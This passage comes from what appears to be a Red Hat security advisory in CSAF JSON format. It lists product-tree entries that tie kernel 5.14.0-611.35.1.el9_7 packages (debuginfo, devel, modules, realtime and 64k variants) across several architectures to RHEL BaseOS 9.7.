"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
